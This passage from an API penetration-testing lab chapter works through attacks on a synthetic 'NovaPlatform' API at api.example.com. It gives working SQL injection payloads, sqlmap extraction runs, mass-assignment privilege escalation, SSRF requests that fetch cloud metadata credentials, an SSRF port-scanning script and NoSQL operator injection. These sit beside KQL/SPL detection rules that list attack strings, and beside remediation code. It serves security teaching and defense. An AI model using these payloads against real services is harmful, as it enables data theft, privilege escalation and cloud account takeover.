    TargetEndpoints = make_set(URL, 20)
    by ClientIP, bin(TimeGenerated, 5m)

KQL Detection: BOLA / IDOR Attacks

// Detect sequential object ID enumeration
ApiAccessLog
| where TimeGenerated > ago(15m)
| where URL matches regex @"/users/user-\d+/"
| extend TargetUserID = extract(@"/users/(user-\d+)", 1, URL)
| extend AuthUserID = extract(@'"sub"\s*:\s*"([^"]+)"', 1, TokenPayload)
| where TargetUserID != AuthUserID  // Accessing other users' resources
| summarize
    UniqueTargets = dcount(TargetUserID),
    RequestCount = count(),
    TargetList = make_set(TargetUserID, 50)
    by AuthUserID, ClientIP, bin(TimeGenerated, 5m)
| where UniqueTargets > 3
| order by UniqueTargets desc

KQL Detection: Cross-Tenant Access

// Detect access attempts across tenant boundaries
ApiAccessLog
| where TimeGenerated > ago(1h)
| extend RequestTenant = extract(@'"tenant"\s*:\s*"([^"]+)"', 1, TokenPayload)
| extend ResourceTenant = extract(@'"tenant"\s*:\s*"([^"]+)"', 1, ResponseBody)
| where isnotempty(RequestTenant) and isnotempty(ResourceTenant)
| where RequestTenant != ResourceTenant
| project TimeGenerated, ClientIP, URL, RequestTenant, ResourceTenant, StatusCode
| summarize CrossTenantAttempts = count() by RequestTenant, ResourceTenant, ClientIP

SPL Detection: Authentication Anomalies

index=api_logs sourcetype=api_access
| rex field=authorization "^(?:Bearer\s+)?(?<jwt_header>[^.]+)\."
| eval decoded_header=base64decode(jwt_header)
| rex field=decoded_header "\"alg\"\s*:\s*\"(?<jwt_algorithm>[^\"]+)\""
| search jwt_algorithm!=RS256
| bin _time span=5m
| stats count as attempts, values(jwt_algorithm) as algorithms,
        dc(uri_path) as unique_endpoints by src_ip _time
| where attempts > 1
| sort -attempts

Defensive Recommendations

Securing API Authentication and Authorization

  1. Enforce JWT algorithm on the server side — never trust the alg header from the client. Hardcode RS256 in the verification logic and reject tokens with any other algorithm
  2. Implement object-level authorization checks — every endpoint that accesses a resource must verify that the authenticated user has permission to access that specific object
  3. Enforce tenant isolation at the data layer — add tenant ID to every database query as a mandatory filter, not just as a check in application code
  4. Use opaque, non-sequential resource IDs — replace predictable IDs like user-1001 with UUIDs or random identifiers to prevent enumeration
  5. Validate OAuth2 redirect URIs with exact match — do not allow subdomain wildcards or path variations
  6. Implement scope validation — the authorization server must verify that requested scopes are appropriate for the authenticated user's role
  7. Decommission legacy API versions — if v1 must remain, apply the same security controls as v2, including JWT-based authentication
  8. Add rate limiting to authentication endpoints — prevent brute-force token forging attempts

Cross-Reference

For deeper coverage of authentication mechanisms and penetration testing methodology, see Chapter 16: Penetration Testing and Chapter 44: Web App Pentesting.


Exercise 3: Injection & Data Exposure

Objectives

  • Discover and exploit SQL injection vulnerabilities through API parameters
  • Exploit mass assignment to escalate privileges or modify protected fields
  • Identify excessive data exposure in API responses
  • Execute SSRF attacks through API endpoint parameters
  • Test for NoSQL injection in search functionality

OWASP API Mapping

Finding Category           OWASP API 2023
SQL injection              API8:2023 — Security Misconfiguration
Mass assignment            API3:2023 — Broken Object Property Level Authorization
Excessive data exposure    API3:2023 — Broken Object Property Level Authorization
SSRF                       API7:2023 — Server Side Request Forgery

Step 3.1: SQL Injection via API Parameters

Test Search Endpoint for SQLi

# Normal search request
curl -s -X POST https://api.example.com/v2/search \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"query": "project report", "type": "projects", "limit": 10}' | jq .

Expected Output (Synthetic):

{
  "results": [
    {
      "id": "proj-1001",
      "name": "Q1 Project Report",
      "type": "project",
      "score": 0.95
    },
    {
      "id": "proj-1003",
      "name": "Annual Report Dashboard",
      "type": "project",
      "score": 0.82
    }
  ],
  "total": 2,
  "query_time_ms": 45
}

Inject SQL via Sort Parameter

# Test ORDER BY injection in the sort parameter
curl -s "https://api.example.com/v2/projects?sort=name&order=ASC" \
  -H "Authorization: Bearer $TOKEN" | jq .

# Inject via sort parameter
curl -s "https://api.example.com/v2/projects?sort=name;SELECT+pg_sleep(5)--&order=ASC" \
  -H "Authorization: Bearer $TOKEN" -w "\nTime: %{time_total}s\n"

Expected Output (Synthetic):

{
  "error": "Database error",
  "detail": "column \"name;SELECT pg_sleep(5)--\" does not exist"
}
Time: 0.234s

# Time-based blind SQL injection via sort parameter
# Test with conditional sleep. Both CASE branches return an integer, because
# PostgreSQL cannot match pg_sleep()'s void result with a text column in one CASE
curl -s "https://api.example.com/v2/projects?sort=CASE+WHEN+(1=1)+THEN+(SELECT+1+FROM+pg_sleep(5))+ELSE+1+END&order=ASC" \
  -H "Authorization: Bearer $TOKEN" -w "\nTime: %{time_total}s\n"

Expected Output (Synthetic):

Time: 5.312s    ← Response delayed by ~5 seconds confirms SQLi

# Confirm with false condition (should be fast)
curl -s "https://api.example.com/v2/projects?sort=CASE+WHEN+(1=2)+THEN+(SELECT+1+FROM+pg_sleep(5))+ELSE+1+END&order=ASC" \
  -H "Authorization: Bearer $TOKEN" -w "\nTime: %{time_total}s\n"

Expected Output (Synthetic):

Time: 0.198s    ← Fast response confirms conditional execution

Critical Finding: Blind SQL Injection in Sort Parameter

The sort parameter is directly interpolated into the SQL ORDER BY clause without sanitization. Time-based blind SQL injection is confirmed. An attacker could extract the entire database contents through conditional time delays. This represents both an injection vulnerability and API8:2023 — Security Misconfiguration (lack of parameterized queries).
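
Column names and sort directions cannot be bound as query parameters, so the usual remedy for an ORDER BY injection is an allowlist that maps user input onto fixed SQL fragments. A minimal sketch, with a hypothetical set of sortable columns:

```python
# Hypothetical mapping from public sort keys to real column names
SORTABLE_COLUMNS = {"name": "name", "created": "created_at", "updated": "updated_at"}
SORT_DIRECTIONS = {"ASC", "DESC"}


def build_order_by(sort: str, order: str) -> str:
    """Translate request parameters into a fixed ORDER BY fragment, or raise ValueError."""
    column = SORTABLE_COLUMNS.get(sort)
    direction = order.upper()
    if column is None or direction not in SORT_DIRECTIONS:
        raise ValueError("unsupported sort parameter")
    # Only values from the dictionaries above ever reach the SQL text
    return f"ORDER BY {column} {direction}"


print(build_order_by("name", "asc"))
try:
    build_order_by("name;SELECT pg_sleep(5)--", "ASC")
except ValueError as exc:
    print("rejected:", exc)
```

The user-supplied string is used only as a dictionary key, so no part of it is ever concatenated into the statement.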

Automated SQLi Extraction with sqlmap

# Use sqlmap for automated extraction (SYNTHETIC - educational only)
sqlmap -u "https://api.example.com/v2/projects?sort=name&order=ASC" \
  --headers="Authorization: Bearer $TOKEN" \
  --param-del="&" \
  -p "sort" \
  --technique=T \
  --dbms=PostgreSQL \
  --level=3 \
  --risk=2 \
  --batch \
  --threads=1 \
  --delay=1

# Expected sqlmap output (SYNTHETIC):
# [INFO] parameter 'sort' is vulnerable. Type: time-based blind
# [INFO] the back-end DBMS is PostgreSQL

# Extract database information (SYNTHETIC - educational only)
sqlmap -u "https://api.example.com/v2/projects?sort=name&order=ASC" \
  --headers="Authorization: Bearer $TOKEN" \
  -p "sort" \
  --technique=T \
  --dbms=PostgreSQL \
  --dbs \
  --batch

Expected Output (Synthetic):

available databases [3]:
[*] information_schema
[*] novaplatform_db
[*] pg_catalog

# Enumerate tables (SYNTHETIC - educational only)
sqlmap -u "https://api.example.com/v2/projects?sort=name&order=ASC" \
  --headers="Authorization: Bearer $TOKEN" \
  -p "sort" \
  --technique=T \
  --dbms=PostgreSQL \
  -D novaplatform_db \
  --tables \
  --batch

Expected Output (Synthetic):

Database: novaplatform_db
[12 tables]
+------------------------+
| users                  |
| projects               |
| files                  |
| api_keys               |
| oauth_clients          |
| oauth_tokens           |
| webhooks               |
| audit_log              |
| billing_subscriptions  |
| billing_invoices       |
| tenant_config          |
| sessions               |
+------------------------+

SQL Injection via JSON Body Parameters

# Test SQLi in JSON body search query
curl -s -X POST https://api.example.com/v2/search \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"query": "test\" OR 1=1--", "type": "projects", "limit": 100}' | jq .

Expected Output (Synthetic):

{
  "results": [
    {"id": "proj-1001", "name": "Q1 Project Report", "type": "project"},
    {"id": "proj-1002", "name": "Internal Tools", "type": "project"},
    {"id": "proj-1003", "name": "Annual Report Dashboard", "type": "project"},
    {"id": "proj-2001", "name": "Classified Research Project", "type": "project"},
    {"id": "proj-2002", "name": "Competitor Analysis", "type": "project"}
  ],
  "total": 47,
  "query_time_ms": 12
}

Finding: Boolean-Based SQLi Returns Cross-Tenant Data

The OR 1=1 tautology makes the search endpoint return all 47 projects across all tenants, including tenant-002 data like "Classified Research Project" and "Competitor Analysis". The query parameter is injected into a SQL WHERE clause without parameterization.
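
For comparison, here is a sketch of the same search written with bound parameters, using an in-memory SQLite database as a stand-in for the PostgreSQL backend. The schema and `search_projects` are assumptions for illustration; the point is that the payload from this step is matched as literal text and the tenant filter cannot be removed by user input.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE projects (id TEXT, tenant TEXT, name TEXT)")
conn.executemany(
    "INSERT INTO projects VALUES (?, ?, ?)",
    [
        ("proj-1001", "tenant-001", "Q1 Project Report"),
        ("proj-2001", "tenant-002", "Classified Research Project"),
    ],
)


def search_projects(conn: sqlite3.Connection, tenant: str, query: str, limit: int = 10):
    """Bind the tenant, search term, and limit as parameters instead of formatting SQL."""
    pattern = f"%{query}%"
    return conn.execute(
        "SELECT id, name FROM projects WHERE tenant = ? AND name LIKE ? ORDER BY id LIMIT ?",
        (tenant, pattern, limit),
    ).fetchall()


print(search_projects(conn, "tenant-001", "report"))
print(search_projects(conn, "tenant-001", 'test" OR 1=1--'))
```

A production version would likely also escape the LIKE wildcards `%` and `_` in the user's term, which this sketch leaves out.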

Extract Sensitive Data via UNION Injection

# UNION-based extraction of API keys (SYNTHETIC - educational only)
curl -s -X POST https://api.example.com/v2/search \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "query": "x\" UNION SELECT id, key_value, user_id, NULL, NULL FROM api_keys--",
    "type": "projects",
    "limit": 100
  }' | jq .

Expected Output (Synthetic):

{
  "results": [
    {
      "id": "key-001",
      "name": "REDACTED-API-KEY-EXAMPLE",
      "type": "user-1001",
      "score": null
    },
    {
      "id": "key-042",
      "name": "REDACTED-API-KEY-EXAMPLE",
      "type": "user-1002",
      "score": null
    },
    {
      "id": "key-099",
      "name": "REDACTED-API-KEY-EXAMPLE",
      "type": "user-9001",
      "score": null
    }
  ],
  "total": 15
}

Step 3.2: Mass Assignment Attacks

Identify Writable Fields via API Spec Analysis

# Review the PATCH /v2/me endpoint schema
cat novaplatform-openapi.json | jq '.paths["/v2/me"].patch.requestBody.content["application/json"].schema'

Expected Output (Synthetic):

{
  "type": "object",
  "properties": {
    "full_name": {"type": "string"},
    "email": {"type": "string", "format": "email"},
    "phone": {"type": "string"},
    "address": {"type": "string"},
    "notification_preferences": {
      "type": "object",
      "properties": {
        "email_alerts": {"type": "boolean"},
        "sms_alerts": {"type": "boolean"}
      }
    }
  }
}

Test Mass Assignment — Role Escalation

# Attempt to set role via profile update (field not in documented schema)
curl -s -X PATCH https://api.example.com/v2/me \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "full_name": "Test User",
    "role": "admin"
  }' | jq .

Expected Output (Synthetic):

{
  "id": "user-1001",
  "username": "testuser",
  "email": "testuser@example.com",
  "full_name": "Test User",
  "role": "admin",
  "tenant": "tenant-001",
  "subscription_tier": "basic",
  "updated_at": "2026-04-01T09:15:00Z"
}

Critical Finding: Mass Assignment — Role Escalation

The role field is not documented in the API specification for the PATCH /v2/me endpoint, but the server accepts and applies it. A standard user can escalate to admin by including "role": "admin" in a profile update request. This is API3:2023 — Broken Object Property Level Authorization.
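
A common countermeasure is to accept only the fields the documented schema declares. The sketch below derives its allowlist from the PATCH /v2/me schema shown earlier in this step; the function name and the choice to reject (rather than silently drop) unknown fields are assumptions.

```python
# Writable fields taken from the documented PATCH /v2/me request schema
WRITABLE_PROFILE_FIELDS = frozenset(
    {"full_name", "email", "phone", "address", "notification_preferences"}
)


def filter_profile_update(body: dict) -> dict:
    """Return a copy of the update, or raise ValueError if it names undocumented fields."""
    unexpected = set(body) - WRITABLE_PROFILE_FIELDS
    if unexpected:
        raise ValueError(f"fields not writable: {sorted(unexpected)}")
    return dict(body)


print(filter_profile_update({"full_name": "Test User"}))
try:
    filter_profile_update({"full_name": "Test User", "role": "admin"})
except ValueError as exc:
    print("rejected:", exc)
```

Rejecting the request outright makes probing visible in logs, whereas silently dropping fields hides the attempt.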

Test Mass Assignment — Subscription Upgrade

# Attempt to upgrade subscription tier without payment
curl -s -X PATCH https://api.example.com/v2/me \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "full_name": "Test User",
    "subscription_tier": "enterprise",
    "billing_exempt": true
  }' | jq .

Expected Output (Synthetic):

{
  "id": "user-1001",
  "username": "testuser",
  "email": "testuser@example.com",
  "full_name": "Test User",
  "role": "admin",
  "tenant": "tenant-001",
  "subscription_tier": "enterprise",
  "billing_exempt": true,
  "updated_at": "2026-04-01T09:16:00Z"
}

Finding: Mass Assignment — Financial Impact

The user can set subscription_tier to "enterprise" and billing_exempt to true, bypassing the payment process entirely. This has direct financial impact — it is both API3:2023 — Broken Object Property Level Authorization and API6:2023 — Unrestricted Access to Sensitive Business Flows.

Test Mass Assignment — Tenant Switching

# Attempt to switch tenant via profile update
curl -s -X PATCH https://api.example.com/v2/me \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "full_name": "Test User",
    "tenant": "tenant-002"
  }' | jq .

Expected Output (Synthetic):

{
  "id": "user-1001",
  "username": "testuser",
  "email": "testuser@example.com",
  "full_name": "Test User",
  "role": "admin",
  "tenant": "tenant-002",
  "subscription_tier": "enterprise",
  "updated_at": "2026-04-01T09:17:00Z"
}

Critical Finding: Mass Assignment — Tenant Boundary Breach

A user can switch their tenant affiliation by including "tenant": "tenant-002" in a profile update. Combined with the BOLA vulnerabilities, this completely breaks multi-tenant isolation. An attacker can migrate themselves to any tenant and access all of its resources.

Step 3.3: Excessive Data Exposure

Analyze API Response Verbosity

# Request project listing — analyze what data is returned vs. what is needed
curl -s https://api.example.com/v2/projects \
  -H "Authorization: Bearer $TOKEN" | jq '.projects[0]'

Expected Output (Synthetic):

{
  "id": "proj-1001",
  "name": "Q1 Project Report",
  "description": "Quarterly project performance analysis",
  "tenant": "tenant-001",
  "owner": {
    "id": "user-1001",
    "username": "testuser",
    "email": "testuser@example.com",
    "phone": "+1-555-0100",
    "role": "user",
    "password_hash": "$2b$12$SYNTHETIC_HASH_VALUE_HERE",
    "last_password_change": "2026-01-15T00:00:00Z",
    "mfa_secret": "JBSWY3DPEHPK3PXP",
    "api_keys": [
      {
        "id": "key-001",
        "key_value": "REDACTED-API-KEY-EXAMPLE",
        "created_at": "2025-06-01T00:00:00Z"
      }
    ]
  },
  "created_at": "2026-01-20T10:00:00Z",
  "updated_at": "2026-03-15T14:30:00Z",
  "files_count": 12,
  "storage_used_bytes": 52428800,
  "settings": {
    "visibility": "team",
    "allow_external_sharing": true
  },
  "internal_notes": "Flagged for review by compliance team",
  "billing_code": "CC-4521",
  "infrastructure": {
    "s3_path": "s3://novaplatform-files-staging/tenant-001/proj-1001/",
    "cdn_url": "https://cdn.example.com/files/tenant-001/proj-1001/"
  }
}

Critical Finding: Massive Data Exposure

The project listing endpoint returns the owner's full user object including:

  • password_hash — bcrypt hash that can be subjected to offline cracking
  • mfa_secret — TOTP seed that allows generating valid MFA codes
  • api_keys[].key_value — full API keys, not just prefixes
  • internal_notes — internal business context
  • infrastructure.s3_path — internal S3 bucket paths

This is a severe API3:2023 — Broken Object Property Level Authorization issue. The API is returning the raw database model without field filtering.
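
Field filtering is easiest to get right when the response is built from an explicit list of fields rather than by removing sensitive ones. The following sketch shows that approach for the project listing; which fields a listing actually needs is an assumption here, and the serializer names are hypothetical.

```python
# Assumption: a project listing only needs to identify the owner
PUBLIC_OWNER_FIELDS = ("id", "username")


def serialize_owner(owner_row: dict) -> dict:
    """Copy only the allowlisted owner fields."""
    return {field: owner_row[field] for field in PUBLIC_OWNER_FIELDS if field in owner_row}


def serialize_project(project_row: dict) -> dict:
    """Build the response explicitly instead of returning the database model."""
    return {
        "id": project_row["id"],
        "name": project_row["name"],
        "description": project_row.get("description"),
        "owner": serialize_owner(project_row.get("owner", {})),
        "updated_at": project_row.get("updated_at"),
    }


raw_row = {
    "id": "proj-1001",
    "name": "Q1 Project Report",
    "owner": {
        "id": "user-1001",
        "username": "testuser",
        "password_hash": "$2b$12$SYNTHETIC_HASH_VALUE_HERE",
        "mfa_secret": "SYNTHETIC",
    },
    "internal_notes": "Flagged for review by compliance team",
}
print(serialize_project(raw_row))
```

With an allowlist, a new sensitive column added to the database later stays out of responses by default.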

Exploit MFA Secret Exposure

# Generate valid TOTP codes from exposed MFA secret (SYNTHETIC - educational only)
import pyotp
import time

# MFA secret exposed in API response
exposed_mfa_secret = "JBSWY3DPEHPK3PXP"  # SYNTHETIC

# Generate current TOTP code
totp = pyotp.TOTP(exposed_mfa_secret)
current_code = totp.now()
print(f"Current TOTP code: {current_code}")
print(f"Valid for: {30 - (int(time.time()) % 30)} seconds")

# An attacker with this secret can generate valid MFA codes indefinitely
# This completely defeats the purpose of MFA

Step 3.4: Server-Side Request Forgery (SSRF)

SSRF via Webhook Test Endpoint

# Legitimate webhook test
curl -s -X POST https://api.example.com/v2/integrations/webhook-test \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "url": "https://webhook.example.com/test",
    "payload": {"event": "test", "timestamp": "2026-04-01T10:00:00Z"}
  }' | jq .

Expected Output (Synthetic):

{
  "status": "success",
  "response_code": 200,
  "response_body": "{\"received\": true}",
  "response_time_ms": 156
}

SSRF — Probe Internal Network

# Attempt SSRF to internal metadata service (cloud)
curl -s -X POST https://api.example.com/v2/integrations/webhook-test \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "url": "http://169.254.169.254/latest/meta-data/",
    "payload": {"event": "test"}
  }' | jq .

Expected Output (Synthetic):

{
  "status": "success",
  "response_code": 200,
  "response_body": "ami-id\nami-launch-index\nami-manifest-path\nhostname\ninstance-action\ninstance-id\ninstance-life-cycle\ninstance-type\nlocal-hostname\nlocal-ipv4\nmac\nnetwork\nplacement\nprofile\npublic-hostname\npublic-ipv4\npublic-keys\nreservation-id\nsecurity-groups\nservices",
  "response_time_ms": 3
}

Critical Finding: SSRF to Cloud Metadata Service

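The webhook test endpoint makes server-side HTTP requests to arbitrary URLs without restriction. It successfully contacts the AWS Instance Metadata Service (IMDS) at 169.254.169.254, which can expose IAM credentials, instance identity, and cloud configuration. The request succeeding without a session token also indicates the instance still accepts IMDSv1; IMDSv2 requires a token obtained through a separate PUT request. This is API7:2023 — Server Side Request Forgery.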

SSRF — Extract Cloud Credentials

# Retrieve IAM role credentials via SSRF (SYNTHETIC)
curl -s -X POST https://api.example.com/v2/integrations/webhook-test \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "payload": {"event": "test"}
  }' | jq -r '.response_body'

Expected Output (Synthetic):

novaplatform-api-role

# Retrieve temporary credentials for the IAM role (SYNTHETIC)
curl -s -X POST https://api.example.com/v2/integrations/webhook-test \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/novaplatform-api-role",
    "payload": {"event": "test"}
  }' | jq -r '.response_body' | jq .

Expected Output (Synthetic):

{
  "Code": "Success",
  "LastUpdated": "2026-04-01T08:00:00Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "REDACTED",
  "SecretAccessKey": "REDACTED",
  "Token": "REDACTED",
  "Expiration": "2026-04-01T14:00:00Z"
}

Critical Finding: SSRF Enables Cloud Account Takeover

Through SSRF, an attacker can retrieve temporary AWS credentials from the Instance Metadata Service. These credentials inherit the IAM role's permissions (novaplatform-api-role), which likely include S3 access to all tenant files, database access, and potentially administrative AWS capabilities. This is a critical API7:2023 — Server Side Request Forgery finding with maximum impact.

SSRF — Scan Internal Network

# Internal network port scanning via SSRF (SYNTHETIC - educational only)
import requests
import json
import time

base_url = "https://api.example.com/v2/integrations/webhook-test"
headers = {
    "Authorization": "Bearer SYNTHETIC_TOKEN_HERE",
    "Content-Type": "application/json"
}

# Scan known internal subnet
internal_targets = [
    ("10.50.2.10", 5432, "PostgreSQL"),
    ("10.50.2.20", 6379, "Redis"),
    ("10.50.2.30", 9200, "Elasticsearch"),
    ("10.50.1.30", 9000, "OAuth2 Server"),
    ("10.50.3.10", 8443, "Webhook Dispatcher"),
]

for ip, port, service in internal_targets:
    try:
        response = requests.post(
            base_url,
            headers=headers,
            json={
                "url": f"http://{ip}:{port}/",
                "payload": {"event": "test"}
            },
            timeout=10
        )
        result = response.json()
        status = result.get("response_code", "timeout")
        print(f"[{'OPEN' if status != 'timeout' else 'CLOSED'}] {ip}:{port} ({service}) - Status: {status}")
    except Exception as e:
        print(f"[ERROR] {ip}:{port} ({service}) - {str(e)}")

    time.sleep(0.5)  # Rate limiting

Expected Output (Synthetic):

[OPEN] 10.50.2.10:5432 (PostgreSQL) - Status: 200
[OPEN] 10.50.2.20:6379 (Redis) - Status: 200
[OPEN] 10.50.2.30:9200 (Elasticsearch) - Status: 200
[OPEN] 10.50.1.30:9000 (OAuth2 Server) - Status: 200
[OPEN] 10.50.3.10:8443 (Webhook Dispatcher) - Status: 200

SSRF — Access Internal Elasticsearch

# Query Elasticsearch directly via SSRF (SYNTHETIC)
curl -s -X POST https://api.example.com/v2/integrations/webhook-test \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "url": "http://10.50.2.30:9200/_cat/indices?v",
    "payload": {"event": "test"}
  }' | jq -r '.response_body'

Expected Output (Synthetic):

health status index                     uuid                   pri rep docs.count
green  open   novaplatform-projects     abc123SYNTHETIC        1   1   4521
green  open   novaplatform-users        def456SYNTHETIC        1   1   892
green  open   novaplatform-audit        ghi789SYNTHETIC        1   1   156203
green  open   novaplatform-files-meta   jkl012SYNTHETIC        1   1   28451

# Test for NoSQL injection in search filters
curl -s -X POST https://api.example.com/v2/search \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "query": "test",
    "type": "projects",
    "filters": {
      "owner": {"$ne": null},
      "visibility": {"$regex": ".*"}
    },
    "limit": 100
  }' | jq '.total'

Expected Output (Synthetic):

47

Finding: NoSQL Operator Injection

The search endpoint passes filter objects directly to the query engine without sanitizing MongoDB-style operators ($ne, $regex, $gt, etc.). The $ne: null operator matches every document whose owner field is set, bypassing the intended filtering. Although the primary database is PostgreSQL, search is served from Elasticsearch. Elasticsearch's native Query DSL does not use $-prefixed operators, so in this synthetic scenario the search service is assumed to translate them into backend query clauses without validation.
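
One way to close this gap is to validate the filters object before it reaches any query builder. The sketch below is illustrative only: `ALLOWED_FILTER_FIELDS` and `sanitize_filters` are hypothetical names, and the field list is an assumption rather than NovaPlatform's real schema. It accepts only known field names with scalar values, which rejects nested operator objects such as {"$ne": null}.

```python
# Hypothetical allowlist of filterable fields (assumption, not the real schema)
ALLOWED_FILTER_FIELDS = {"owner", "visibility", "status"}
SCALAR_TYPES = (str, int, float, bool)


def sanitize_filters(filters):
    """Return a copy of filters containing only allowlisted scalar values."""
    if not isinstance(filters, dict):
        raise ValueError("filters must be a JSON object")
    clean = {}
    for field, value in filters.items():
        # Unknown fields (including "$where"-style keys) are rejected outright
        if field not in ALLOWED_FILTER_FIELDS:
            raise ValueError(f"unknown filter field: {field!r}")
        # Dicts and lists are where operator payloads hide, so only scalars pass
        if not isinstance(value, SCALAR_TYPES):
            raise ValueError(f"filter {field!r} must be a scalar value")
        clean[field] = value
    return clean
```

Rejecting the request, rather than silently stripping operators, keeps the behavior predictable and makes probing attempts visible in logs.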

Detection & Defense — Exercise 3

KQL Detection: SQL Injection Attempts

// Detect SQL injection patterns in API requests
let sqli_patterns = dynamic(["UNION SELECT", "OR 1=1", "pg_sleep",
    "CASE WHEN", "information_schema", "DROP TABLE",
    "INSERT INTO", "UPDATE SET", "--", "/*", "*/", "xp_cmdshell"]);
ApiAccessLog
| where TimeGenerated > ago(1h)
| where URL has_any (sqli_patterns)
    or RequestBody has_any (sqli_patterns)
| project TimeGenerated, ClientIP, Method, URL, RequestBody, StatusCode, UserAgent
| extend AttackType = case(
    URL has "UNION" or RequestBody has "UNION", "UNION-based SQLi",
    URL has "pg_sleep" or RequestBody has "pg_sleep", "Time-based Blind SQLi",
    URL has "OR 1=1" or RequestBody has "OR 1=1", "Boolean-based SQLi",
    "Generic SQLi"
)
| summarize Attempts = count(), AttackTypes = make_set(AttackType) by ClientIP, bin(TimeGenerated, 5m)

KQL Detection: SSRF Attempts

// Detect SSRF attempts via webhook/integration endpoints
ApiAccessLog
| where TimeGenerated > ago(1h)
| where URL has_any ("/webhook-test", "/integrations/", "/import")
| where RequestBody has_any ("169.254.169.254", "metadata", "10.50.",
    "127.0.0.1", "localhost", "0.0.0.0", "[::]", "0x7f", "2130706433")
| project TimeGenerated, ClientIP, URL, RequestBody, StatusCode
| extend SSRFTarget = extract(@'"url"\s*:\s*"([^"]+)"', 1, RequestBody)
| summarize
    SSRFAttempts = count(),
    Targets = make_set(SSRFTarget, 20)
    by ClientIP, bin(TimeGenerated, 5m)

KQL Detection: Mass Assignment

// Detect mass assignment attempts (fields not in allowed list)
let allowed_fields = dynamic(["full_name", "email", "phone", "address",
    "notification_preferences"]);
ApiAccessLog
| where TimeGenerated > ago(1h)
| where Method == "PATCH" and (URL has "/me" or URL matches regex @"/users/[^/]+")
| extend RequestFields = extract_all(@'"(\w+)"\s*:', RequestBody)
| mv-expand RequestField = RequestFields to typeof(string)
| where RequestField !in (allowed_fields)
| project TimeGenerated, ClientIP, URL, RequestField, RequestBody, StatusCode
| summarize SuspiciousFields = make_set(RequestField),
            Count = count() by ClientIP, bin(TimeGenerated, 5m)

SPL Detection: SSRF via Internal Network Access

index=api_logs sourcetype=api_access
| search uri_path="/v2/integrations/webhook-test" OR uri_path="/v2/webhooks"
| rex field=request_body "\"url\"\s*:\s*\"(?<target_url>[^\"]+)\""
| eval is_internal=if(
    match(target_url, "^https?://(10\.|172\.(1[6-9]|2[0-9]|3[01])\.|192\.168\.|169\.254\.|127\.|localhost|0\.0\.0\.0)"),
    "yes", "no")
| search is_internal="yes"
| bin _time span=5m
| stats count as ssrf_attempts, values(target_url) as targets by src_ip, _time
| sort -ssrf_attempts

Defensive Recommendations

Preventing Injection, Data Exposure, and SSRF

  1. Use parameterized queries everywhere — never interpolate user input into SQL/NoSQL queries, including ORDER BY clauses
  2. Implement response DTOs (Data Transfer Objects) — define explicit response schemas that include only the fields clients need; never return raw database models
  3. Allowlist writable fields for mass assignment — on PATCH/PUT endpoints, explicitly define which fields can be modified and reject all others
  4. Implement SSRF protections:
    • Validate and allowlist destination URLs for webhook/integration features
    • Block requests to private IP ranges (RFC 1918, link-local, loopback)
    • Block requests to cloud metadata services (169.254.169.254)
    • Use IMDSv2 (require PUT-based token) to prevent simple SSRF exploitation
    • Use a dedicated egress proxy with URL filtering
  5. Sanitize error responses — never include SQL queries, stack traces, or internal paths
  6. Implement input validation — validate all input against expected types, patterns, and ranges
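
The SSRF protections in item 4 can be sketched as a destination check that runs before the server issues any outbound request. This is a minimal illustration, not NovaPlatform's actual code: `ALLOWED_SCHEMES`, `ALLOWED_HOSTS`, and `validate_webhook_url` are hypothetical names. The sketch inspects only the URL string. A production check would also need to resolve the hostname, re-check the resolved address, and refuse redirects, to resist DNS rebinding.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"https"}               # assumption: webhooks must use HTTPS
ALLOWED_HOSTS = {"webhook.example.com"}   # hypothetical per-tenant allowlist


def is_blocked_ip(host: str) -> bool:
    """True if host is an IP literal in a range that must never be fetched."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # not an IP literal; the hostname allowlist decides
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved or ip.is_multicast)


def validate_webhook_url(url: str) -> bool:
    """Allow only HTTPS URLs whose host is explicitly allowlisted."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False
    host = parts.hostname
    if not host or is_blocked_ip(host):
        return False
    # Deny by default: anything not on the allowlist is refused
    return host in ALLOWED_HOSTS
```

Because the allowlist is the final gate, alternate encodings of internal addresses (for example a bare decimal host) are refused even though they are not parsed as IP literals.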

Cross-Reference

For SSRF in cloud environments and cloud-specific attack patterns, see Chapter 20: Cloud Attack & Defense. For DevSecOps pipeline integration of API security testing, see Chapter 35: DevSecOps Pipeline.


Exercise 4: Rate Limiting & Business Logic

Objectives

  • Discover and bypass API rate limiting mechanisms
  • Exploit race conditions in API workflows
  • Identify and abuse business logic flaws in financial and administrative workflows
  • Test resource exhaustion through API abuse
  • Chain multiple low-severity issues into high-impact attack paths

OWASP API Mapping

Finding Category | OWASP API 2023
Rate limit bypass | API4:2023 — Unrestricted Resource Consumption
Race conditions | API6:2023 — Unrestricted Access to Sensitive Business Flows
Business logic abuse | API6:2023 — Unrestricted Access to Sensitive Business Flows
Resource exhaustion | API4:2023 — Unrestricted Resource Consumption

Step 4.1: Rate Limit Analysis and Bypass

Discover Rate Limiting Configuration

# Analyze rate limit headers from multiple endpoints
for endpoint in /v2/me /v2/projects /v2/search /v2/auth/login /v2/admin/users; do
    echo "--- $endpoint ---"
    curl -s -I "https://api.example.com${endpoint}" \
